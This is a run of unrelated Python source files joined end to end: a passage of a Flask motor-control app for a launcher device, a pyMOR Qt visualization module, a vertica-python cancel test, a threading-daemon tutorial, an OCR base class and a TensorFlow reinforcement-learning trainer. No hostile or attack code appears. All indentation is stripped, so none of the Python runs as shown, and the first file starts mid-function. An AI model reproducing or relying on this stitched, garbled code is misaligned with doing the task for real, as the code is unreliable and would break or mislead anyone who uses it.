rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
# Automatic launch works, but it is disabled becuase the loop while prevents
# the motors to stop when the button Stop is pressed, making it dangerous
##@app.route('/app_automatic_launch', methods=['POST'])
##def function_automatic_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
##
## #Prepare
## if pitch_ready == 0:
## pitch_objective = 0
## else:
## pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## if lift_ready == 0:
## lift_objective = 0
## else:
## lift_objective = int(lift_pulses/(lift_length/lift_ready))
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_1 = (0,0,0)
## buffer_2 = (0,0,0)
## while(buffer_1[1]!=0x80): #Loop until pitch is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_1[2]!=0x80): #Loop until rotation is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_2[1]!=0x80): #Loop until lift is completed
## buffer_2 = rc.ReadBuffers(address_2)
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Launch
## launch_objective = launch_break
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## rc.SpeedDistanceM2(address_2,launch_speed_pulses,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Standby
## pitch_objective = 0
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## lift_objective = 0
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## return (''), 204
@app.route('/app_change_pitch', methods=['POST'])
def function_change_pitch():
pitch_position_prepare = request.form.get('pitch_position_prepare', type=int)
if pitch_position_prepare > pitch_length or pitch_position_prepare < 0:
return (''), 400
global pitch_ready
pitch_ready = float(pitch_position_prepare)
return (''), 204
@app.route('/app_change_lift', methods=['POST'])
def function_change_lift():
lift_position_prepare = request.form.get('lift_position_prepare', type=int)
if lift_position_prepare > lift_length or lift_position_prepare < 0:
return (''), 400
global lift_ready
lift_ready = float(lift_position_prepare)
return (''), 204
@app.route('/app_change_rotation', methods=['POST'])
def function_change_rotation():
rotation_position_prepare = request.form.get('rotation_position_prepare', type=int)
if rotation_position_prepare > rotation_length or rotation_position_prepare < 0:
return (''), 400
global rotation_ready
rotation_ready = float(rotation_position_prepare)
return (''), 204
@app.route('/app_change_speed', methods=['POST'])
def function_change_speed():
speed = request.form.get('speed', type=int)
if speed > launch_max_speed or speed < launch_min_speed:
return (''), 400
global launch_speed_pulses
global launch_acceleration
if speed > 7:
launch_speed_pulses = speed*13400
launch_acceleration = 655360 #Maximum value
return (''), 204
else:
launch_speed_pulses = speed*13400
launch_acceleration = (launch_speed_pulses**2)/13400
return (''), 204
@app.route('/app_change_acceleration', methods=['POST'])
def function_change_acceleration():
acceleration = request.form.get('acceleration', type=int)
if acceleration > launch_max_acceleration or acceleration < launch_min_acceleration:
return (''), 400
acceleration = acceleration*13400
global launch_acceleration
launch_acceleration = acceleration
return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
if __name__ == "__main__":
try:
# Deplying main program for the lights:
# Intialize the library (must be called once before other functions).
print("asd")
threading.Thread(target = thermo.read_loop, daemon = False).start()
print("asd")
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
strip.begin()
print ('STANDBY MODE')
colorWipe(strip, Color(255, 255, 255)) # White wipe
#app.run(host=host,port=port) #starting the server for the webinterface
app.run('localhost',port=5000, debug=True)
#app.run(debug=True)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
|
qt.py
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2020 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
""" This module provides a few methods and classes for visualizing data
associated to grids. We use the `Qt <http://www.qt-project.org>`_ widget
toolkit for the GUI.
"""
import math as m
import numpy as np
import multiprocessing
from pymor.core.config import config
from pymor.core.config import is_windows_platform
from pymor.core.defaults import defaults
from pymor.core.logger import getLogger
from pymor.core.exceptions import QtMissing
from pymor.discretizers.builtin.grids.vtkio import write_vtk
from pymor.discretizers.builtin.gui.gl import GLPatchWidget, ColorBarWidget
from pymor.discretizers.builtin.gui.matplotlib import Matplotlib1DWidget, MatplotlibPatchWidget
from pymor.vectorarrays.interface import VectorArray
from pymor.vectorarrays.numpy import NumpyVectorSpace
if config.HAVE_QT:
from Qt.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QSlider, QApplication, QLCDNumber,
QAction, QStyle, QToolBar, QLabel, QFileDialog, QMessageBox)
from Qt.QtCore import Qt, QCoreApplication, QTimer, Slot
class PlotMainWindow(QWidget):
"""Base class for plot main windows."""
def __init__(self, U, plot, length=1, title=None):
super().__init__()
layout = QVBoxLayout()
if title:
title = QLabel('<b>' + title + '</b>')
title.setAlignment(Qt.AlignHCenter)
layout.addWidget(title)
layout.addWidget(plot)
plot.set(U, 0)
if length > 1:
hlayout = QHBoxLayout()
self.slider = QSlider(Qt.Horizontal)
self.slider.setMinimum(0)
self.slider.setMaximum(length - 1)
self.slider.setTickPosition(QSlider.TicksBelow)
hlayout.addWidget(self.slider)
lcd = QLCDNumber(m.ceil(m.log10(length)))
lcd.setDecMode()
lcd.setSegmentStyle(QLCDNumber.Flat)
hlayout.addWidget(lcd)
layout.addLayout(hlayout)
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_play = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), 'Play', self)
self.a_play.setCheckable(True)
self.a_rewind = QAction(self.style().standardIcon(QStyle.SP_MediaSeekBackward), 'Rewind', self)
self.a_toend = QAction(self.style().standardIcon(QStyle.SP_MediaSeekForward), 'End', self)
self.a_step_backward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipBackward),
'Step Back', self)
self.a_step_forward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipForward), 'Step', self)
self.a_loop = QAction(self.style().standardIcon(QStyle.SP_BrowserReload), 'Loop', self)
self.a_loop.setCheckable(True)
toolbar.addAction(self.a_play)
toolbar.addAction(self.a_rewind)
toolbar.addAction(self.a_toend)
toolbar.addAction(self.a_step_backward)
toolbar.addAction(self.a_step_forward)
toolbar.addAction(self.a_loop)
if hasattr(self, 'save'):
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
self.a_save.triggered.connect(self.save)
hlayout.addWidget(toolbar)
self.speed = QSlider(Qt.Horizontal)
self.speed.setMinimum(0)
self.speed.setMaximum(100)
hlayout.addWidget(QLabel('Speed:'))
hlayout.addWidget(self.speed)
layout.addLayout(hlayout)
self.timer = QTimer()
self.timer.timeout.connect(self.update_solution)
self.slider.valueChanged.connect(self.slider_changed)
self.slider.valueChanged.connect(lcd.display)
self.speed.valueChanged.connect(self.speed_changed)
self.a_play.toggled.connect(self.toggle_play)
self.a_rewind.triggered.connect(self.rewind)
self.a_toend.triggered.connect(self.to_end)
self.a_step_forward.triggered.connect(self.step_forward)
self.a_step_backward.triggered.connect(self.step_backward)
self.speed.setValue(50)
elif hasattr(self, 'save'):
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
hlayout.addWidget(toolbar)
layout.addLayout(hlayout)
self.a_save.triggered.connect(self.save)
self.setLayout(layout)
self.plot = plot
self.U = U
self.length = length
def slider_changed(self, ind):
self.plot.set(self.U, ind)
def speed_changed(self, val):
self.timer.setInterval(val * 20)
def update_solution(self):
ind = self.slider.value() + 1
if ind >= self.length:
if self.a_loop.isChecked():
ind = 0
else:
self.a_play.setChecked(False)
return
self.slider.setValue(ind)
def toggle_play(self, checked):
if checked:
if self.slider.value() + 1 == self.length:
self.slider.setValue(0)
self.timer.start()
else:
self.timer.stop()
def rewind(self):
self.slider.setValue(0)
def to_end(self):
self.a_play.setChecked(False)
self.slider.setValue(self.length - 1)
def step_forward(self):
self.a_play.setChecked(False)
ind = self.slider.value() + 1
if ind == self.length and self.a_loop.isChecked():
ind = 0
if ind < self.length:
self.slider.setValue(ind)
def step_backward(self):
self.a_play.setChecked(False)
ind = self.slider.value() - 1
if ind == -1 and self.a_loop.isChecked():
ind = self.length - 1
if ind >= 0:
self.slider.setValue(ind)
_launch_qt_processes = set()
def _launch_qt_app(main_window_factory, block):
"""Wrapper to display plot in a separate process."""
def _doit(factory):
try:
app = QApplication([])
except RuntimeError:
app = QCoreApplication.instance()
main_window = factory()
if getattr(sys, '_called_from_test', False) and is_windows_platform():
QTimer.singleShot(500, app, Slot('quit()'))
main_window.show()
app.exec_()
import sys
if (block and not getattr(sys, '_called_from_test', False)) or is_windows_platform():
_doit(main_window_factory)
else:
p = multiprocessing.Process(target=_doit, args=(main_window_factory,))
p.start()
_launch_qt_processes.add(p.pid)
def stop_gui_processes():
import os, signal
kill_procs = {p for p in multiprocessing.active_children() if p.pid in _launch_qt_processes}
for p in kill_procs:
# active_children apparently contains false positives sometimes
p.terminate()
p.join(1)
for p in kill_procs:
if p.is_alive():
os.kill(p.pid, signal.SIGKILL)
@defaults('backend')
def visualize_patch(grid, U, bounding_box=([0, 0], [1, 1]), codim=2, title=None, legend=None,
separate_colorbars=False, rescale_colorbars=False, backend='gl', block=False, columns=2):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True`, block execution until the plot window is closed.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
if not config.HAVE_QT:
raise QtMissing()
assert backend in {'gl', 'matplotlib'}
if backend == 'gl':
if not config.HAVE_GL:
logger = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
logger.warning('import of PyOpenGL failed, falling back to matplotlib; rendering will be slow')
backend = 'matplotlib'
elif not config.HAVE_QTOPENGL:
logger = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
logger.warning('import of Qt.QtOpenGL failed, falling back to matplotlib; rendering will be slow')
backend = 'matplotlib'
if backend == 'matplotlib' and not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
else:
if not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
# TODO extract class
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, bounding_box, codim, title, legend, separate_colorbars, rescale_colorbars, backend):
assert isinstance(U, VectorArray) \
or (isinstance(U, tuple) and all(isinstance(u, VectorArray) for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.to_numpy().astype(np.float64, copy=False),) if isinstance(U, VectorArray) else \
tuple(u.to_numpy().astype(np.float64, copy=False) for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
if backend == 'gl':
widget = GLPatchWidget
cbar_widget = ColorBarWidget
else:
widget = MatplotlibPatchWidget
cbar_widget = None
if not separate_colorbars and len(U) > 1:
l = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
l.warning('separate_colorbars=False not supported for matplotlib backend')
separate_colorbars = True
class PlotWidget(QWidget):
def __init__(self):
super().__init__()
if separate_colorbars:
if rescale_colorbars:
self.vmins = tuple(np.min(u[0]) for u in U)
self.vmaxs = tuple(np.max(u[0]) for u in U)
else:
self.vmins = tuple(np.min(u) for u in U)
self.vmaxs = tuple(np.max(u) for u in U)
else:
if rescale_colorbars:
self.vmins = (min(np.min(u[0]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[0]) for u in U),) * len(U)
else:
self.vmins = (min(np.min(u) for u in U),) * len(U)
self.vmaxs = (max(np.max(u) for u in U),) * len(U)
layout = QHBoxLayout()
plot_layout = QGridLayout()
self.colorbarwidgets = [cbar_widget(self, vmin=vmin, vmax=vmax) if cbar_widget else None
for vmin, vmax in zip(self.vmins, self.vmaxs)]
plots = [widget(self, grid, vmin=vmin, vmax=vmax, bounding_box=bounding_box, codim=codim)
for vmin, vmax in zip(self.vmins, self.vmaxs)]
if legend:
for i, plot, colorbar, l in zip(range(len(plots)), plots, self.colorbarwidgets, legend):
subplot_layout = QVBoxLayout()
caption = QLabel(l)
caption.setAlignment(Qt.AlignHCenter)
subplot_layout.addWidget(caption)
if not separate_colorbars or backend == 'matplotlib':
subplot_layout.addWidget(plot)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
if colorbar:
hlayout.addWidget(colorbar)
subplot_layout.addLayout(hlayout)
plot_layout.addLayout(subplot_layout, int(i/columns), (i % columns), 1, 1)
else:
for i, plot, colorbar in zip(range(len(plots)), plots, self.colorbarwidgets):
if not separate_colorbars or backend == 'matplotlib':
plot_layout.addWidget(plot, int(i/columns), (i % columns), 1, 1)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
if colorbar:
hlayout.addWidget(colorbar)
plot_layout.addLayout(hlayout, int(i/columns), (i % columns), 1, 1)
layout.addLayout(plot_layout)
if not separate_colorbars:
layout.addWidget(self.colorbarwidgets[0])
for w in self.colorbarwidgets[1:]:
w.setVisible(False)
self.setLayout(layout)
self.plots = plots
def set(self, U, ind):
if rescale_colorbars:
if separate_colorbars:
self.vmins = tuple(np.min(u[ind]) for u in U)
self.vmaxs = tuple(np.max(u[ind]) for u in U)
else:
self.vmins = (min(np.min(u[ind]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[ind]) for u in U),) * len(U)
for u, plot, colorbar, vmin, vmax in zip(U, self.plots, self.colorbarwidgets, self.vmins,
self.vmaxs):
plot.set(u[ind], vmin=vmin, vmax=vmax)
if colorbar:
colorbar.set(vmin=vmin, vmax=vmax)
super().__init__(U, PlotWidget(), title=title, length=len(U[0]))
self.grid = grid
self.codim = codim
def save(self):
if not config.HAVE_PYEVTK:
msg = QMessageBox(QMessageBox.Critical, 'Error', 'VTK output disabled. Pleas install pyvtk.')
msg.exec_()
return
filename = QFileDialog.getSaveFileName(self, 'Save as vtk file')[0]
base_name = filename.split('.vtu')[0].split('.vtk')[0].split('.pvd')[0]
if base_name:
if len(self.U) == 1:
write_vtk(self.grid, NumpyVectorSpace.make_array(self.U[0]), base_name, codim=self.codim)
else:
for i, u in enumerate(self.U):
write_vtk(self.grid, NumpyVectorSpace.make_array(u), f'{base_name}-{i}',
codim=self.codim)
_launch_qt_app(lambda: MainWindow(grid, U, bounding_box, codim, title=title, legend=legend,
separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=backend),
block)
def visualize_matplotlib_1d(grid, U, codim=1, title=None, legend=None, separate_plots=False, block=False):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_plots
If `True`, use subplots to visualize multiple |VectorArrays|.
block
If `True`, block execution until the plot window is closed.
"""
if not config.HAVE_QT:
raise QtMissing()
if not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, codim, title, legend, separate_plots):
assert isinstance(U, VectorArray) \
or (isinstance(U, tuple)
and all(isinstance(u, VectorArray) for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.to_numpy(),) if isinstance(U, VectorArray) else tuple(u.to_numpy() for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
plot_widget = Matplotlib1DWidget(None, grid, count=len(U), vmin=[np.min(u) for u in U],
vmax=[np.max(u) for u in U], legend=legend, codim=codim,
separate_plots=separate_plots)
super().__init__(U, plot_widget, title=title, length=len(U[0]))
self.grid = grid
_launch_qt_app(lambda: MainWindow(grid, U, codim, title=title, legend=legend, separate_plots=separate_plots), block)
|
test_cancel.py
|
# Copyright (c) 2019-2021 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from ... import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
# Cursor.cancel() should be not supported any more
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
exec(CancelTestCase.createPrepStmtClass())
|
02-threading_daemons.py
|
#!/usr/bin/env python3
# Threads, by default, are spawned as regular threads and hence
# the programs only fully exit once all the threads exit.
# Threads can be spawned as daemons, which runs in the background
# and parallely, without interferring with the main program, but
# providing support to it.
# Example of such a background thread can be a spell checker in a
# file editor, or a heartbeat checker in a distributed system.
# To start a thread as a daemon, pass `daemon=True` while creating it
# or use its `set_daemon()` method set to `True`.
# By default, the main program flow and other threads don't specifically
# wait for the `daemon` thread to exit, before exiting themselves.
# ie. Other threads and the program itself can exit even if the `daemon`
# thread is running. This won't always be ideal
# Refer the next example for `join()` to overcome this.
import threading
import logging
import time
def daemon_thread():
logging.debug("Starting daemon")
time.sleep(5)
logging.debug("Stopping daemon")
def non_daemon():
logging.debug("Starting non-daemon thread")
time.sleep(5)
logging.debug("Exiting non-daemon thread")
logging.basicConfig(
level=logging.DEBUG, format="[%(levelname)s] (%(threadName)-10s) %(message)s"
)
process_1 = threading.Thread(name="Daemon thread", target=daemon_thread, daemon=True)
process_2 = threading.Thread(name="Non-Daemon thread", target=non_daemon)
process_1.start()
process_2.start()
|
ocr.py
|
from abc import ABC, abstractmethod
from typing import List
import threading
class OCR(ABC):
@abstractmethod
def initialize(self):
''' Initialize the OCR '''
pass
@abstractmethod
def ocr_one_image(self, images:List) -> List:
''' OCR an image.
Input: An array of (area, image)s, opened by PIL and pre-processed
Return: An array of (area, message), where the message is from OCR'''
pass
def ocr(self, images:List) -> List:
'''Sends an opened image to Azure's cognitive services.
Input: images (tuple(area, image))
Returns the results from Tesseract.'''
threads = []
threadResults = ["" for i in range(len(images))]
threadNum = 0
results = []
for image in images:
t = threading.Thread(target=self.ocr_one_image, args=(image[0], image[1]), kwargs={'threadList':threadResults, 'threadNum':threadNum})
t.start()
threads.append(t)
threadNum += 1
for t in threads:
t.join()
i = 0
for result in threadResults:
results.append((images[i][0], result))
i += 1
return results
def __init__(self):
self.initialize()
|
run_trainer.py
|
#!/usr/bin/env python
import argparse
import ckpt_util
from multiprocessing import Process, Queue
from concurrent import futures
import json
import grpc
import numpy as np
import models
import model_pb2
import os
import replay_memory as rm
import sys
import tensorflow as tf
import time
import util
np.set_printoptions(precision=5, threshold=10000, suppress=True, linewidth=10000)
# reopen stdout/stderr unbuffered
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--width', type=int, default=160, help="render width")
parser.add_argument('--height', type=int, default=120, help="render height")
parser.add_argument('--batch-size', type=int, default=128, help="training batch size")
parser.add_argument('--batches-per-new-episode', type=int, default=5,
help="number of batches to train per new episode")
parser.add_argument('--event-log-in', type=str, default=None,
help="if set replay these event files into replay memory (comma"
" separated list")
parser.add_argument('--reset-smooth-reward-factor', type=float, default=0.5,
help="use this value to smooth rewards from reset_from_event_logs")
parser.add_argument('--smooth-reward-factor', type=float, default=0.5,
help="use this value to smooth rewards added during training")
parser.add_argument('--event-log-in-num', type=int, default=None,
help="if set only read this many events from event-logs-in")
parser.add_argument('--gpu-mem-fraction', type=float, default=0.3,
help="fraction of gpu mem to allocate")
parser.add_argument('--trainer-port', type=int, default=20045,
help="grpc port to expose for trainer")
rm.add_opts(parser)
ckpt_util.add_opts(parser)
models.add_opts(parser)
util.add_opts(parser)
opts = parser.parse_args()
print >>sys.stderr, "OPTS", opts
class EnqueueServer(model_pb2.ModelServicer):
""" Enqueues calls to new episode."""
def __init__(self, q):
self.q = q
def AddEpisode(self, events, context):
episode = model_pb2.Episode()
episode.event.extend(events)
self.q.put(episode)
return model_pb2.Empty()
def run_enqueue_server(episodes):
grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=3))
model_pb2.add_ModelServicer_to_server(EnqueueServer(episodes), grpc_server)
grpc_server.add_insecure_port("[::]:%d" % opts.trainer_port)
grpc_server.start()
while True:
time.sleep(10)
def run_trainer(episodes, opts):
# init replay memory
render_shape = (opts.height, opts.width, 3)
replay_memory = rm.ReplayMemory(opts=opts,
state_shape=render_shape,
action_dim=2,
load_factor=1.1)
if opts.event_log_in:
replay_memory.reset_from_event_logs(opts.event_log_in,
opts.event_log_in_num,
opts.reset_smooth_reward_factor)
# init network for training
config = tf.ConfigProto()
#config.gpu_options.allow_growth = True
#config.log_device_placement = True
config.gpu_options.per_process_gpu_memory_fraction = opts.gpu_mem_fraction
sess = tf.Session(config=config)
network = models.NafNetwork("naf", action_dim=2, opts=opts)
with sess.as_default():
# setup saver util and either load saved ckpt or init variables
saver = ckpt_util.TrainerCkptSaver(sess, opts.ckpt_dir, opts.ckpt_save_freq)
for v in tf.all_variables():
if '/biases:' not in v.name:
print >>sys.stderr, v.name, util.shape_and_product_of(v)
network.setup_target_network()
# while true process episodes from run_agents
print util.dts(), "waiting for episodes"
while True:
start_time = time.time()
episode = episodes.get()
wait_time = time.time() - start_time
start_time = time.time()
replay_memory.add_episode(episode,
smooth_reward_factor=opts.smooth_reward_factor)
losses = []
if replay_memory.burnt_in():
for _ in xrange(opts.batches_per_new_episode):
batch = replay_memory.batch(opts.batch_size)
batch_losses = network.train(batch).T[0] # .T[0] => (B, 1) -> (B,)
replay_memory.update_priorities(batch.idxs, batch_losses)
network.target_value_net.update_target_weights()
losses.extend(batch_losses)
